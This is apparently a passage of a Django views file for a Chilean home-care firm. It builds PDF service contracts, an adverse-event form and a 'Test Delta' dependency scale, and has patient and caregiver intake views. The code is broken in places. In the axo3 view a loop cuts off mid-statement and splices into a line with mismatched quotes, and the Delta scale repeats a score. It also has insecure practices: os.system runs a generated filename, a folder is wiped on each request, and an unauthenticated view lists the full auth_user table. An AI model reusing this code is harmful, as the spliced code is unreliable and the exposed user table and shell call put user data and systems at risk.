comprometen a cancelar lo siguiente:\")\n\tc.drawString(30,310,\"Paciente de baja complejidad:\")\n\t#\n\tc.drawString(30,285,\"-Turno diurno $ 28.000.- Lunes a Sabado de 8:00 a 20:00 Hrs. (Día Hábil)\")\n
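\t# NOTE (added): these tariffs are hard-coded into the contract text, so rate\n\t# changes must be edited here by hand\n\tc.drawString(30,270,\"-Turno Nocturno $ 30.000.- Lunes a Sabado de 20:00 a 8:00 Hrs. 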
(Día Hábil)\")\n\tc.drawString(30,255,\"-Domingo y feriados Diurnos $ 42.000.-\")\n\tc.drawString(30,240,\"-Domingo y visperas de Feriado Nocturno $ 45.000.-\")\n\tc.drawString(30,225,\"-Medio turno individual 8:00 a 14:00 ó 14:00 a 20:00 Hrs. $ 15.000.-\")\n\t#\n\tc.drawString(30,200,\"Abono Inicial: El cliente deberá abonar los primeros 4 a 6 turnos, que corresponden a 48 o 72 horas\")\n\tc.drawString(30,185,\"y cada turno equivale a 12 horas continuas, estos valores seran abonados y rebajados del primer\")\n\tc.drawString(30,170,\"cobro semanal del cliente.\")\n\n\t#Grabamos la página presente del canvas\n\tc.showPage() #salto de pagina\n\t#\n\t## COMIENZA SEGUNDA PAGINA ###\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\t#if paciente.abono_inicial != 0 and paciente.abono_inicial != None:\n\tif valor_abono != 0 and valor_abono != None:\n\t\t#return HttpResponse(\"Abono inicial es distinto de cero: \"+str(paciente.abono_inicial))\n\t\tc.drawString(30,660, \"Monto abono $: \"+str(valor_abono)+\" Forma de pago: \"+abon_x)\n\t\tcol = 600\n\t\t#if cheque_x != \"\" or cheque_x != None:\n\t\tif abon_x != \"Efectivo\":\t\n\t\t\tc.drawString(30,645, \"Cheque número.....: \"+str(cheque_x)+\" de fecha :\"+str(fe_che))\n\t\t\tc.drawString(30,630, \"Banco.............: \"+banco_x.strip())\n\t\t\t#col = 600 # inhibido el 19042020\n\telse:\n\t\tc.drawString(30,660, \"** No registra Abono inicial **\")\n\t\tcol = 630\n\n\tc.drawString(30,col, \"Por otra parte, el Prestador, deberá emitir de manera individualizada y detallada el COBRO DE LOS\")\n\tcol = col - 15\n\tc.drawString(30,col, \"SERVICIOS DE CUIDADOS POR PERIODOS SEMANALES O EN MENOR PLAZO QUE SE REQUIERA,\")\n\tcol = col - 15\n\tc.drawString(30,col, \"siendo responsabilidad del Cliente la INMEDIATA CANCELACION por cada informe emitido, pudiendo\")\n\tcol = col - 15\n\tc.drawString(30,col, \"solicitar la boleta una vez cancelados los servicios, acordando un plazo no superior a un dia posterior\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"a la emision del respectivo documento, el no cumplimiento a lo establecido resultará en la suspensión\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"automática del servicio, como así en los casos de atrasos y reposición de mas de una oportunidad,\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"darán cabida al término del presente contrato.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"Se deja constancia que los plazos de cancelación del presente contrato NO guardan relación alguna\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"con los establecidos por la institucion médica del paciente, por cuanto Asistencia integral es una\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"empresa de tipo externa a la cual puede contactar directamente en caso de dificultades, dudas o \")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"agradecimientos.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"CUARTO: son obligaciones del Prestador de Servicios, las siguientes:\")\n\tcol = col - 15\n\tc.drawString(40,col, \"a) Realizar los servicios de acuerdo a lo establecido en la clausula primera de este contrato\")\n\tcol = col - 15\n\tc.drawString(40,col, \" En forma eficiente. 
\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"b) Guardar el secreto sobre los datos proporcionados por Los Clientes y sobre aquellos que\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" conozca en el desempeño de las funciones.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"c) Contar con los Asistentes necesarios para una oportuna prestación del servicio.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"d) Que los asistentes cuenten con un uniforme que los distinga del personal de la institución\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" prestadora del servicio medico del paciente.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"e) Que los asistentes cuenten con una credencial que los identifique claramente.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"f) Disponer de un uniforme si el cliente lo requiere.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"QUINTO: Son obligaciones del Cliente, las siguientes:\")\n\tcol = col - 15\n\tc.drawString(40,col, \"a) Abonar al Prestador de Servicios la retribución en la forma acordada, conforme a la oportuna\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" facturación realizada por este.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"b) Informar oportunamente al Prestador respecto de cualquier tipo de dificultad que hubiere entre el \")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" Cliente o el paciente y el Asistente de Enfermos.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"c) Respetar los conductos regulares de la institución prestadora del servicio médico del paciente\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" frente a la entrega de artículos personales, artículos de higiene, dinero\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" o cualquier otro efecto del paciente.\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"d) Dar aviso en forma inmediata frente a la orden medica de cese de actividades por parte del\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" Asistente de enfermos via email a contacto@asistenciaintegral.cl\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \"e) Ante las dificultades, dirigirse con el o la supervisora de turno correspondiente a la\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" la empresa de asistentes de enfermos a fin de exponer y dar pronta solución ante eventuales\")\n\n\tcol = col - 15\n\tc.drawString(40,col, \" requerimientos.\")\n\n\n\tc.showPage() # page break #################################################\n\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGE, X,Y, WIDTH, HEIGHT)\n\n\tcol = 660\n\tc.drawString(40,col, \"f) Ante felicitaciones o sugerencias hacerlas llegar por escrito a acastillo@asistenciaintegral.cl\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"SEXTO: La duración del presente contrato será del tiempo necesario requerido por la Orden Médica,\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"pudiendo a su vencimiento, ser objeto de renovación frente a los requerimientos del paciente,\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"médico o Cliente, para tal efecto previamente deberá existir un aviso por medio de la enfermera\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"o paramédico del pabellón de la institución en que se encuentre el paciente, adicionando el aviso\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"correspondiente de aprobación por parte del Cliente via email a contacto@asistenciaintegral.cl\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"SEPTIMO: Para los efectos en la interpretación respecto del presente Contrato de prestación de\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"Servicios, las partes establecen que la jurisdicción de los tribunales ordinarios corresponderán\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"a los con asiento en la ciudad de Santiago.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"Al mismo tiempo el Cliente autoriza a Asistencia Integral Limitada, RUT:76.191.893-1 para que\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"en el evento de mora, simple retardo o incumplimiento, en el total o parte de las cancelaciones \")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"antes indicadas, los datos personales y los relativos a este incumplimiento se traten y/o comuniquen\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"en la base de datos DICOM, como asi mismo su cobro sea transferido a la empresa de cobranza en\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"convenio.\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"OCTAVO: Para constancia y en señal de plena conformidad de los acuerdos establecidos en el\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \"presente contrato, firman el prestador de servicios y el cliente respectivamente, en dos\")\n\n\tcol = col - 15\n\tc.drawString(30,col, \" ejemplares pudiendo quedar uno en poder de cada interesado-.\")\n\n\t# fingerprint box\n\tcol = col - 150\n\tc.rect(460, col, 80, 90)\n\tc.drawString(475,col-15, \"(Huella)\")\n\n\tcol = col - 30\n\tc.drawString(30,col, \"Asistencia Integral Ltda.-. _______________________\")\n\tcol = col - 15\n\tc.drawString(30,col, \" GERENCIA Nombre:\")\n\tcol = col - 15\n\tc.drawString(30,col, \" RUT:76.191.893-1 CI:\")\n\n\tc.showPage() # page break\n\tc.save() # write the file and close the canvas\n\t# launch the generated pdf\n\tos.system(nom_arch)\n\n\t# produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\n\t# desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\t# (unreachable leftover code that rendered grid_pacientes.html was removed here)\n\ndef siexisterut(request):\n\tvariable1 = 'Pantalla de prueba para implementar AJAX'\n\tresultado = ''\n\tpaciente = Pacientes # model\n\tform \t = PacientesForm(request.GET or None) # form\n\tif request.method == 'POST':\n\t\tresultado = 'noexiste'\t\t\n\t\trut_x = request.POST.get('rut') \n\t\texiste = paciente.objects.filter(rut=rut_x).exists()\n\t\tif existe == True:\n\t\t\tresultado = 'existe'\n\t\telse:\n\t\t\tresultado = 'noexiste'\n\t\n\tcontext = {\n\t\t\"resultado\":resultado,\n\t\t\"form\":form,\n\t\t\"variable1\":variable1,\n\t\t}\t\t\n\t# bug fix: the return was commented out, so the view returned None\n\treturn render(request,'NuevoPac2.html',context)\n\n\ndef NuevoPac2(request):\n\tvariable1 = 'Ingresando nuevo paciente'\n\tvariable2 = ''\n\tresultado = False\n\tfechahoy = datetime.now()\t\t\n\tmes_numerico = fechahoy.month \n\tano_hoy = fechahoy.year\t\t\n\tnuevo_pac = 1\t# switch that shows the button listing the reports to generate\n
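\t# NOTE (added): Param is a generic lookup table keyed by (tipo, codigo); each\n\t# filter below loads one picklist for the template\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = 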
Param.objects.filter(tipo='COBR').order_by('codigo')\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo')\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('-valor1')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\t\n\tprevi\t= Param.objects.filter(tipo='PREVI')\t\n\tform \t= PacientesForm(request.POST or None)\n\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'region':region,\n\t\t'comuna':comuna,\n\t\t'sexo':sexo,\n\t\t'cob':cob,\n\t\t'clasi':clasi,\n\t\t'abon':abon,\n\t\t'nuevo_pac':nuevo_pac,\n\t\t'yace':yace,\n\t\t'resultado':resultado,\n\t\t'car_doc_cobro':\"3\",\n\t\t'previ':previ,\n\t\t'ecivil':ecivil,\t\n\t\t}\n\n\tif request.method == \"POST\":\n\t\tpaciente = Pacientes # modelo\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\tresultado = paciente.objects.filter(rut=rut_x).exists() # devuelte un true o false\n\t\tregistro = paciente.objects.filter(rut=rut_x) # devuelve el registro del paciente\n\t\tfor dato in registro:\n\t\t\tid_x = dato.id\n\t\t\tnom_x = dato.nombre\n\n\t\tif resultado==False:\n\t\t\treturn render(request,'ficha_pacientes.html',context)\n\t\telse:\n\t\t\tvariable2 = \"Paciente: \"+nom_x+\", ya existe !!\"\t\n\t\t\tcontext = {\n\t\t\t\t'form':form,\n\t\t\t\t'variable1':variable1,\n\t\t\t\t'variable2':variable2,\n\t\t\t\t'resultado':resultado,\n\t\t\t\t'nuevo_pac':nuevo_pac,\n\t\t\t\t'id_x':id_x,\n\t\t\t\t'rut_x':rut_x,}\n\treturn render(request, 'NuevoPac2.html',context)\n\n\ndef NuevoCui3(request):\n\tvariable1 = 'Agregando nueva ficha de cuidador'\n\tvariable2 = \"modifica_rut\"\n\tresultado = False\n\terror_new = \"ok\"\n\tfechahoy = datetime.now()\t\t\n\tmes_numerico = fechahoy.month \n\tano_hoy = fechahoy.year\t\t\n\tnuevo_cui = 1\t# nuevo\n\tid_x = 1\t# para que no grite\n\tregion = Param.objects.filter(tipo='REGI').order_by('descrip')\n\tcomuna = Param.objects.filter(tipo='COMU').order_by('descrip')\n\tsexo = Param.objects.filter(tipo='SEXO').order_by('codigo')\n\tcob = Param.objects.filter(tipo='COBR').order_by('codigo')\n\tclasi = Param.objects.filter(tipo='PROC').order_by('codigo')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo')\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('-valor1')\n\ttipo = Param.objects.filter(tipo='CONTR').order_by('codigo') # Contratado - honorarios\n\tinstr\t= Param.objects.filter(tipo='INSTR').order_by('codigo')\n\tecivil\t= Param.objects.filter(tipo='ECIVI')\t\n\tprevi\t= Param.objects.filter(tipo='PREVI')\t\n\tform \t= CuidadoresForm(request.POST or None)\n\n\tif request.method == \"POST\":\n\t\tvariable2 = \"nomodifica_rut\"\n\t\tcuidador = Cuidadores # modelo\n\t\trut_x = request.POST.get('rut') # valor del template\n\t\textran = request.POST.get('extran') # valor del template\n\t\tresultado = cuidador.objects.filter(rut=rut_x).exists() # devuelte un true o false\n\t\tregistro = cuidador.objects.filter(rut=rut_x) # devuelve el registro del paciente\n\t\tfor dato in registro:\n\t\t\tid_x = dato.id\n\t\t\tnom_x = dato.nombre\n\n\t\tcuidador.extran = 0 \n\n\t\tcontext = {\n\t\t\t'form':form,\n\t\t\t'variable1':variable1,\n\t\t\t'variable2':variable2,\n\t\t\t'region':region,\n\t\t\t'comuna':comuna,\n\t\t\t'sexo':sexo,\n\t\t\t'tipo':tipo,\n\t\t\t'clasi':clasi,\n\t\t\t'instr':instr,\n\t\t\t'nuevo_cui':nuevo_cui,\n\t\t\t'error_new':error_new,\n\t\t\t'extran':extran,\n\t\t\t}\n\n\t\tif resultado==False:\t# si existe o no\n\t\t\treturn render(request,'ficha_cuidadores.html',context) # si no existe, 
muestra plantilla en blanco\n\t\telse:\n\t\t\tvariable2 = nom_x+\", ya existe !!\"\t\n\t\t\t#return render(request,'ficha_cuidadores.html',context)\n\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'resultado':resultado,\n\t\t'id_x':id_x,\t\t\t\t\n\t\t}\n\treturn render(request, 'NuevoCui3.html',context)\n\n\ndef grid_cheques(request):\n\tvariable1 = 'Listado de cheques'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t#\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\t#\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tmes_numerico = fechahoy.month # mes en numero\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\n\tif request.method == \"POST\":\n\t\tmes_hoy = request.POST.get('meses') # valor viene del template\n\t\tano_hoy = request.POST.get('ano')\t # valor viene del template como aaaa\n\t\tano_hoy = int(ano_hoy) # para que funcione el combo debe ser INT()\n\t\tmes_numerico = meses.index(mes_hoy) + 1 # entrega el numerico del mes\n\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] #total dias del mes\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\tbanco\t= Param.objects.filter(tipo='BCO').order_by('descrip')\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo') # Efec,Cheq,Tarj\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\n\tcuenta = 0\n\t\n\tcheques = Anticipos.objects.filter(fecha_cheque__range=(fecha_ini,fecha_fin),\n\t\tabon=2).exclude(fecha_cheque__exact=None).order_by('fecha_cheque')\n\n\t#cheques = Anticipos.objects.filter(fecha_cheque__range=(fecha_ini,fecha_fin),\n\t#\tabon=2).exclude(fecha_cheque__exact=None).order_by('fecha_cheque').select_related()\n\n\t#return HttpResponse(\"El nombre es: \"+cheques.Pacientes.nombre)\n\n\t#cheques = Anticipos.objects.select_related()\n\t\n\tfor ch in cheques:\n\t\tcuenta = cuenta + 1\n\n\tcontext = {\n\t\t'cheques':cheques,\n\t\t'variable1':variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"mes_numerico\":mes_numerico,\n\t\t\"banco\":banco,\n\t\t\"abon\":abon,\n\t\t\"paciente\":paciente,\n\t\t\"cuenta\":cuenta,}\n\treturn render(request,'grid_cheques.html',context)\n\n# PARA ESTUDIO\n#sql_usuarios = \"\"\"select u.id, u.username,u.first_name,u.last_name from auth_user_groups aug\n# join auth_user u on u.id = aug.user_id\n# join auth_group ag on ag.id = aug.group_id\n# where not ag.name ='ciudadano' and u.is_superuser = False and u.is_active = True\n# group by u.id ,username, first_name, last_name, email,is_active\n# order by u.username;\"\"\"\n# \n#\tusuarios = User.objects.raw(sql_usuarios)\n# fin PARA ESTUDIO \n\n\ndef grid_login(request):\n\tvariable1 = 'Login de usuarios del Sistema'\n\t#cursor = connection.cursor() #es necesario: from django.db import connection\n\t#sql_usuarios = \"\"\"select * from auth_user order by username;\"\"\"\n\tsql_usuarios = \"select * from auth_user order by username;\"\n\tuserlog = User.objects.raw(sql_usuarios)\n\tcuenta = 0\n\tfor lg in userlog:\n\t\tcuenta = cuenta + 1\n\tcontext = 
{\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,\n\t\t\"userlog\":userlog,}\n\treturn render(request,'grid_login.html',context)\n\n\n@login_required(login_url='login_ini')\ndef axo3(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612\t\n\tnom_arch = \"axo3\"+nombrearch()+\".pdf\"\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t# ######### COMIENZA EL REPORTE ########\t\t\n ## comienza primera pagina #########\n\ty = 710\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\ty = 690\n\tc.drawString(148,y, \"Anexo 3: Formulario de Notificación de Eventos Adversos (EA)\")\n\ty = y - 15\n\tc.drawString(200,y, \"Pacientes con Cuidadora en Domicilio\")\n\ty = y - 40\n\tc.drawString(35,y, \"1.- Datos del evento:\")\n\n\tdata = [\n\t\t[\"Nombre completo del paciente\",paciente,\"R.U.T.:\",rut_aux],\n\t\t[\"fecha de notificacion\",\" \",\"Fecha evento:\",\" \"],\n\t\t[\"Lugar en el que ocurre\",\" \",\"Hora:\", \" \"],\n\t]\n\n\tt = Table(data, rowHeights=35, repeatCols=1)\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) # w=475, h=105 \n\tt.drawOn(c, 50, alto - (h + 180), 0) # alto=792, ancho=612\n\n\t## SEGUNDA TABLA ####################\n\t#y = w \n\ty = 475\n\tc.drawString(35,y, \"2.- Tipo de evento:\")\n\n\ty = y - 30 # y=429\n\tc.drawString(50,y, \"Ambito: Atención y cuidados de pacientes con servicio de cuidadora a domicilio\")\n\tespacio = \" \"\n\tdata = [\n\t\t[\"Caidas\",espacio],\n\t\t[\"Úlceras por presión\",espacio],\n\t\t[\"Salida accidental de dispositivo invasivo\",espacio],\n\t\t[\"Error de medicacion (error u omisión o falta de stock)\",espacio],\n\t\t]\n\n\tt2 = Table(data, rowHeights=35, repeatCols=1)\n\n\tt2.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t2.wrap(100, 100) # h=140, w=475 \n\t\n\t#y = y - 15 # 414\n\t#c.drawString(35,y, \"ordenada h=\"+str(h)+\" w=\"+str(w)+\" y=\"+str(y))\n\n\th = h + 190 # 330 ultima ordenada de objeto grid\n\tt2.drawOn(c, 50, alto - (h + 180), 0)\n\n\ty = 250\n\tc.drawString(35,y, \"3.- Descripción del evento ocurrido:\")\n\t#c.drawString(35,y, \"ordenada h=\"+str(h)+\" w=\"+str(w)+\" y=\"+str(y))\n\tabcisa = 50\n\ty = 226\n\n\ti=1\n\twhile i < 6:\n\t\tc.line(abcisa, y, abcisa + 450, y)\n\t\ty = y 
\tc.drawString(50,y,"Responsable de la notificación:___________________________________________\")\n\ty = y - 30\n\tc.drawString(230,y, \"Dirección Médica Nacional\")\n\n\t## ######## FIN DEL REPORTE #########\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef testdelta(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612\t\n\tnom_arch = \"delta\"+nombrearch()+\".pdf\"\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n ## #####################################comienza primera pagina #########\n\ty = 710\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\ty = 690\n\tc.drawString(50,y, \"TEST DELTA\")\n\ty = y - 30\n\tc.drawString(50,y,\"Paciente: \"+str(paciente)+\", RUT: \"+rut_aux)\n\t\n\t# AQUI VA LA GRID\n\tdata = [\n\t\t[\"Test Delta\",\"Puntaje\",\" \"],\n\t\t[\"Válido\",\"0 a 1\",\" \"],\n\t\t[\"Asistido leve\",\"2 a 9 \",\" \"],\n\t\t[\"Asistido moderado\",\"10 a 19\",\" \"],\n\t\t[\"Asistido severo\",\"20 a 30\",\" \"],\n\t]\n\n\t#t = Table(data, colWidths=[285,285],rowHeights=35, repeatCols=0)\n\tt = Table(data, colWidths=[100,60,80])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\n\t#t.drawOn(c, 50, alto - (h + 145), 0)\t# h=90 \n\tt.drawOn(c, 50, 557, 0) # alto=792, h=90\n\n\ty = 555 - 16\n\tc.drawString(35,y, \"1.-MOVILIZACION:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Asistencia ocasional para la movilización desde la cama, WC, silla o silla de ruedas\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa ayuda frecuente para la movilización desde la cama, WC, silla o silla de ruedas\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) La ayuda es necesaria en forma permanente\")\n\n\ty=y-30\n\tc.drawString(35,y, \"2.- DEAMBULACION Y DESPLAZAMIENTO:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo, aunque lleva algún medio 
de apoyo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Necesita ayuda esporádica\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa ayuda con frecuencia para la deambulación\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Hay que desplazarse siemnpre. Incapaz de impulsar la silla de ruedas.Encamado\")\n\n\ty=y-30\n\tc.drawString(35,y, \"3.- ASEO:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Precisa ayuda ocacional en el aseo diario:lavado de manos, cara, afeitado, peinado, etc.\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Necesita ayuda frecuentemente para el aseo diario.\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Hay que ayudarlo siempre.\")\n\n\ty=y-30\n\tc.drawString(35,y, \"4.- VESTIDO:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Autónomo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) En ocaciones hay que ayudarle\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Necesita siempre ayuda para ponerse alguna prenda o calzarse.\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Es necesario vestirlo y calzarlo totalmente.\")\n\n\ty=y-30\n\tc.drawString(35,y, \"5.- ALIMENTACIÓN:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Lo hace solo\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Precisa ayuda ocacional para comer. A veces hay que prepararle los alimentos\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa con frecuencia ayuda para comer. Se suele preparar los alimentos\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Hay que administrarle la comida\")\n\tc.showPage() # ########################################################salto de pagina\n\ty=700\n\tc.drawString(35,y, \"6.- HIGIENE BACTERIANA:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Continencia. Incontinencia urinaria esporadica.\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Incontinencia urinaria nocturna y fecal esporadica. Colostomia\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Incontinencia urinaria permanente, diurna y nocturna. Sonda vesical\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Incontinencia urinaria y fecal total\")\n\n\ty=y-30\n\tc.drawString(35,y, \"7.- ADMINISTRACION DE TRATAMIENTOS:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) No precisa. 
